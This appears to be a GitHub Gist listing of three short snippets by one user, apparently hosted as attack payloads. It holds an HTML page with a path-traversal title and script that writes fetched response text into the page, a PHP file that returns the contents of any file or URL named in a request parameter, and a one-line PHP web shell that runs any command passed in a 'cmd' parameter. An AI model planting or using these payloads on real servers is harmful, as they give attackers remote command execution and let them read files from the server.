Skip to content

Instantly share code, notes, and snippets.

@Qymaen
Qymaen / a.html
Last active March 22, 2020 15:44
<head>
<title>abc/../../pdf</title>
</head>
<body>
<script>document.write(123)</script>
<script>
function reqListener () {
document.write(this.responseText);
}
@Qymaen
Qymaen / rfi
Created February 17, 2020 21:16
<?php echo file_get_contents($_REQUEST['rfi']); ?>
@Qymaen
Qymaen / a.php
Created February 13, 2020 16:01
<?php system($_REQUEST['cmd']); ?>